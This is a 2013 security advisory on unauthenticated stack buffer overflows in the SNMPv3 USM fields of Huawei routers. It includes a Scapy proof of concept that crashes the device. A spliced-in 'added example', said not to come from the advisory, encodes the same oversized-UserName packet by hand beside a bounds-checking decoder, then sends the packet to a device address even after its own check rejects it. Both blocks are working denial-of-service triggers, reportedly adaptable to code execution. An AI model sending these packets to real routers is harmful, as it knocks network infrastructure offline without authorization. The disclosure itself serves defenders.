Huawei SNMPv3 Buffer Overflow Vulnerability
Source: roberto.paleari@emaze.net  Author: Paleari  Published: 2013-05-07
Multiple buffer overflows on Huawei SNMPv3 service
==================================================

[ADVISORY INFORMATION]
Title:    Multiple buffer overflows on Huawei SNMPv3 service
Discovery date: 11/02/2013
Release date:   06/05/2013
Credits:   Roberto Paleari (roberto.paleari@emaze.net, @rpaleari)
Advisory URL:   http://blog.emaze.net/2013/05/multiple-buffer-overflows-on-huawei.html

[VULNERABILITY INFORMATION]
Class:           Memory errors

[AFFECTED PRODUCTS]
We confirm the presence of these security vulnerabilities on the following
products:
   * Huawei AR1220 (firmware version V200R002C02SPC121T)
According to Huawei security advisories [2,3] other products are also
vulnerable, but they were not checked.

[VULNERABILITY DETAILS]
The Huawei SNMPv3 service running on the affected devices is vulnerable to
multiple stack-based buffer overflow issues. These vulnerabilities can be
exploited by unauthenticated remote attackers.

The issues concern Huawei's implementation of the SNMPv3 User-based Security
Model (USM [1]). Specifically, attackers can overflow the
"AuthoritativeEngineID" and "UserName" fields of the USM security parameters.

The vulnerabilities we identified can be classified according to the
exploitation context: some issues can be triggered only when SNMP debugging is
enabled, while others are exploitable in the default device configuration.

The first class of issues can be exploited only when SNMP debugging is enabled,
as they are related to the debugging code that displays the content of
incoming SNMP packets. Attackers can leverage these issues to achieve RCE, but
the actual impact is quite low, as SNMP debugging is usually disabled during
normal operation.

The second class of vulnerabilities affects the SNMPv3 packet decoder.
Unlike the previous ones, these issues can be exploited in the
default device configuration. Additionally, it is worth considering that ACLs
are ineffective at mitigating this threat, as SNMPv3 packets are processed by
the device even if the sender's IP is not included in the ACL. Similarly, the
vulnerabilities can be exploited even when no SNMPv3 users are configured.

In the following we include a proof-of-concept that exploits the latter
category. Our PoC simply crashes the device, but the payload can probably
also be adapted to achieve RCE.

This Python example crashes the device by overflowing the "UserName" SNMPv3 USM
field. Note that we used a slightly modified version of the Python Scapy library
to properly support the SNMPv3 protocol. The complete Python script and the
modified Scapy library can be provided upon request.

<cut>
from scapy.all import *   # requires the modified Scapy build with SNMPv3/USM support

def main():
    DST = "192.168.1.1"   # target device

    snmp = SNMPv3(version=3)
    pkt = IP(dst=DST)/UDP(sport=RandShort(), dport=161)/snmp
    pkt = snmpsetauth(pkt, "emaze", "MD5")
    pkt["SNMPv3"].flags = 4   # msgFlags: reportable, noAuthNoPriv

    # Replace "user_name" with "auth_engine_id" in the next line to trigger the
    # other overflow
    pkt["SNMPv3"].security.user_name = "A"*4096   # oversized USM UserName field

    pkt.show()
    send(pkt)

if __name__ == "__main__":
    main()
</cut>
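The same trigger can be rebuilt without the modified Scapy by encoding the SNMPv3 message and its USM security parameters by hand, which also makes it clear where the decoder should have refused the packet. The block below is an added example, not code from the advisory or from Emaze: it BER-encodes an SNMPv3Message (RFC 2572) whose msgSecurityParameters carry a UsmSecurityParameters SEQUENCE (RFC 2574) with an oversized "UserName", and pairs it with a bounds-checking decoder that enforces the RFC size limits (SnmpEngineID at most 32 octets, msgUserName at most 32 octets) before any copy into a fixed-size buffer could take place. The helper names, the sample engine ID and the device address are assumptions for illustration.

```python
# Added example, not code from the Emaze advisory or its modified-Scapy PoC:
# hand-rolled BER encoding of an SNMPv3/USM message with an oversized
# msgUserName, beside the bounds check a decoder needs before copying USM
# fields into fixed-size stack buffers. Limits from RFC 2571/2574; the
# engine ID and device address are constructed values.
import socket

MAX_ENGINE_ID = 32   # SnmpEngineID: OCTET STRING (SIZE(5..32)), RFC 2571
MAX_USER_NAME = 32   # msgUserName: OCTET STRING (SIZE(0..32)), RFC 2574

def ber_len(n):
    """BER length: short form below 128, long form (0x8N + N bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def ber_tlv(tag, content): return bytes([tag]) + ber_len(len(content)) + content
def ber_octets(data): return ber_tlv(0x04, data)
def ber_seq(*parts): return ber_tlv(0x30, b"".join(parts))

def ber_int(value):
    """Two's-complement INTEGER, enough for the non-negative fields used here."""
    size = max(1, (value.bit_length() + 8) // 8)
    return ber_tlv(0x02, value.to_bytes(size, "big", signed=True))

def usm_security_params(engine_id, user_name, boots=0, time=0,
                        auth_params=b"", priv_params=b""):
    """UsmSecurityParameters SEQUENCE, field order as in RFC 2574 section 2.4."""
    return ber_seq(ber_octets(engine_id), ber_int(boots), ber_int(time),
                   ber_octets(user_name), ber_octets(auth_params),
                   ber_octets(priv_params))

def snmpv3_message(user_name, engine_id=b"", msg_id=0x1234, flags=0x04):
    """SNMPv3Message (RFC 2572) around a plaintext ScopedPDU with an empty GetRequest.
    flags=0x04 is reportable + noAuthNoPriv, as in the advisory's PoC: the USM
    parameters get parsed before any user or authentication is consulted."""
    get_request = ber_tlv(0xA0, ber_int(1) + ber_int(0) + ber_int(0) + ber_seq())
    scoped_pdu = ber_seq(ber_octets(b""), ber_octets(b""), get_request)
    header = ber_seq(ber_int(msg_id), ber_int(65507),
                     ber_octets(bytes([flags])), ber_int(3))  # securityModel 3 = USM
    return ber_seq(ber_int(3), header,
                   ber_octets(usm_security_params(engine_id, user_name)), scoped_pdu)

def ber_read(buf, off=0):
    """Decode one TLV at buf[off:] as (tag, content, next_off); every length is
    checked against the buffer before it is trusted."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first, off = buf[off], buf[off + 1], off + 2
    if first & 0x80:
        n = first & 0x7F
        if n == 0 or n > 4 or off + n > len(buf):
            raise ValueError("bad long-form length")
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    else:
        length = first
    if off + length > len(buf):
        raise ValueError("TLV content exceeds buffer")
    return tag, buf[off:off + length], off + length

def ber_seq_items(content):
    items, off = [], 0
    while off < len(content):
        tag, value, off = ber_read(content, off)
        items.append((tag, value))
    return items

def parse_usm_security_params(msg):
    """Extract msgAuthoritativeEngineID and msgUserName, rejecting oversized
    fields instead of copying them into fixed-size buffers."""
    tag, body, _ = ber_read(msg)
    if tag != 0x30:
        raise ValueError("SNMPv3Message is not a SEQUENCE")
    fields = ber_seq_items(body)
    if len(fields) != 4 or int.from_bytes(fields[0][1], "big", signed=True) != 3:
        raise ValueError("not an SNMPv3 message")
    sec_tag, sec_blob = fields[2]
    if sec_tag != 0x04:
        raise ValueError("msgSecurityParameters must be an OCTET STRING")
    usm_tag, usm_body, _ = ber_read(sec_blob)
    usm = ber_seq_items(usm_body) if usm_tag == 0x30 else []
    if len(usm) != 6:
        raise ValueError("malformed UsmSecurityParameters")
    engine_id, user_name = usm[0][1], usm[3][1]
    if len(engine_id) > MAX_ENGINE_ID or len(user_name) > MAX_USER_NAME:
        raise ValueError("USM field over RFC size limit: engineID=%d user=%d"
                         % (len(engine_id), len(user_name)))
    return {"engine_id": engine_id, "user_name": user_name}

if __name__ == "__main__":
    # Constructed trigger: a discovery-style message with a 4096-byte user name.
    trigger = snmpv3_message(b"A" * 4096)
    try:
        parse_usm_security_params(trigger)
    except ValueError as exc:
        print("hardened decoder rejects the packet:", exc)
    socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(trigger, ("192.168.1.1", 161))
```

Swapping the `user_name` argument for `engine_id` produces the "AuthoritativeEngineID" variant. Note that the decoder checks every BER length against the remaining buffer and the two USM fields against their RFC maxima before returning them; a decoder that trusts the encoded length and copies into a stack buffer sized for a 32-octet name is exactly the pattern the advisory describes.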

[REMEDIATION] 
The device manufacturer has released updated firmware versions that should
remediate these issues. Huawei security advisories are available at [2,3].

[COPYRIGHT]
Copyright(c) Emaze Networks S.p.A 2013, All rights reserved worldwide.
Permission is hereby granted to redistribute this advisory, providing that no
changes are made and that the copyright notices and disclaimers remain intact.

[DISCLAIMER]
Emaze Networks S.p.A is not responsible for the misuse of the information
provided in our security advisories. These advisories are a service to the
professional security community. There are NO WARRANTIES with regard to this
information. Any application or distribution of this information constitutes
acceptance AS IS, at the user's own risk. This information is subject to change
without notice.

Footnotes:
[1] http://www.ietf.org/rfc/rfc2574.txt
[2] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260601.htm
[3] http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-260626.htm
